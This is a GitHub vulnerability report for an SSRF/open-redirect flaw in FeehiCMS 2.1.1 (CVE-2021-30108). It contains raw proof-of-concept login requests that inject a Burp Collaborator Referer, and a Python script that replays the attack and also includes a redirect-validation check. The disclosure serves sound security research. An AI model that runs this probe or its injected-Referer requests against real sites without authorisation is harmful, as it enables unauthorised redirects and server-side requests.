
SSRF vulnerability in feehicms v2.1.1 #57

Closed
Jason1314Zhang opened this issue Apr 1, 2021 · 3 comments

@Jason1314Zhang

This is a server-side request forgery vulnerability. We can change the HTTP Referer header to any URL, and the server will then request it. Details are as follows:

We need to send two requests.

1. First, register an account normally; here my account is test123 and the password is 123456.

2. Log out of our account and log in again, as shown in the picture below.

  [image]

Use Burp Suite to change the HTTP Referer header:

  [image]

The first POC request is as follows

GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

3. Log in with our account and password.

  [image]

Use Burp Suite; we don't modify anything.

The second POC request is as follows

POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=

Then we find that the response to the second request contains a 302 redirect; the redirect URL is the Referer header of our first request.

The response to the second request is as follows:

  [image]

4. Vulnerability proof

  [image]
  [image]

5. How to fix

https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
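The two-request sequence in steps 1 to 3 above, as a scripted check. This is an added example, not code from FeehiCMS or from the report: request 1 fetches the login page with a chosen Referer, request 2 submits the login form with redirects disabled, and the Location header of the response is compared against the host used in request 1. The login path, the form field names and the hidden `_csrf` input are taken from the captured requests; the target URL, account, marker host and the CSRF regex are assumptions. `redirect_is_same_origin` is the kind of check the linked OWASP guidance expects before a server issues a redirect to a URL it did not choose itself.

```python
"""Scripted check for the two-request sequence in the report above.

Added example; it is not code from FeehiCMS or from the original report.
Assumptions: the login endpoint is index.php?r=site%2Flogin, the form field
names are the ones in the captured POST, the CSRF token is a hidden input
named _csrf, and a successful login answers with a 3xx.  The target URL,
account and marker host used under __main__ are placeholders.
"""
import http.cookiejar
import re
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_PORTS = {"http": 80, "https": 443}


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx responses so the raw Location header stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def origin(url: str):
    """(scheme, host, port) of an absolute URL, with default ports filled in."""
    parts = urllib.parse.urlsplit(url)
    scheme = parts.scheme.lower()
    return (scheme, (parts.hostname or "").lower(),
            parts.port or DEFAULT_PORTS.get(scheme))


def redirect_is_same_origin(location, base_url: str) -> bool:
    """True only if Location resolves (relative to base_url) to base_url's origin.

    Protocol-relative targets (//host/...) and userinfo tricks (host@evil)
    resolve to a foreign origin and are rejected; an absent Location is rejected.
    """
    if not location:
        return False
    return origin(urllib.parse.urljoin(base_url, location)) == origin(base_url)


def redirect_targets_host(location, base_url: str, host: str) -> bool:
    """True if the redirect lands on `host` (here: the marker host from request 1)."""
    if not location:
        return False
    return origin(urllib.parse.urljoin(base_url, location))[1] == host.lower()


def parse_csrf_token(html: str) -> str:
    """Extract the hidden _csrf value from the login form (assumed input layout)."""
    m = re.search(r'name="_csrf"[^>]*value="([^"]+)"', html)
    if not m:
        raise ValueError("no _csrf hidden input found in login page")
    return m.group(1)


def probe(base_url, username, password, marker_url, timeout=10):
    """Replay the report's sequence; return (status, Location) of the login POST."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(jar), NoRedirect())
    login_url = urllib.parse.urljoin(base_url, "index.php?r=site%2Flogin")

    # Request 1: fetch the login page with the attacker-controlled Referer.
    req = urllib.request.Request(login_url, headers={"Referer": marker_url})
    with opener.open(req, timeout=timeout) as resp:
        token = parse_csrf_token(resp.read().decode("utf-8", "replace"))

    # Request 2: ordinary login POST; the Referer now points at the site itself.
    form = urllib.parse.urlencode({
        "_csrf": token,
        "LoginForm[username]": username,
        "LoginForm[password]": password,
        "LoginForm[rememberMe]": "0",
        "login-button": "",
    }).encode()
    req = urllib.request.Request(login_url, data=form,
                                 headers={"Referer": login_url})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # 3xx surfaces here because of NoRedirect
        return err.code, err.headers.get("Location")


if __name__ == "__main__":
    BASE = "http://demo.cms.feehi.com/"              # placeholder target
    MARKER = "http://example.burpcollaborator.net/"  # placeholder marker URL
    status, location = probe(BASE, "test123", "123456", MARKER)
    marker_host = urllib.parse.urlsplit(MARKER).hostname
    if redirect_targets_host(location, BASE, marker_host):
        print(f"VULNERABLE: {status} -> {location} (echoes the Referer from request 1)")
    elif status in (301, 302, 303, 307, 308) and not redirect_is_same_origin(location, BASE):
        print(f"SUSPICIOUS: {status} -> {location} (off-origin redirect)")
    else:
        print(f"not reproduced: {status} -> {location}")
```

Run it against an instance you are authorised to test; the marker host should be one you control so a hit on it is unambiguous. The origin comparison deliberately uses the parsed hostname rather than a string prefix, which is why `http://demo.cms.feehi.com@evil.example/` and `//evil.example/` are both rejected.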


OS-WS commented May 25, 2021

Hi,
This issue was assigned with CVE-2021-30108.
Was it ever addressed / fixed?

@Jason1314Zhang (Author)

> Hi,
> This issue was assigned with CVE-2021-30108.
> Was it ever addressed / fixed?

It hasn't been fixed yet

liufee (Owner) commented Aug 29, 2022

@Jason1314Zhang d45cb9c
Hi, thanks for your feedback.
The security problem has been fixed.

@liufee liufee closed this as completed Aug 29, 2022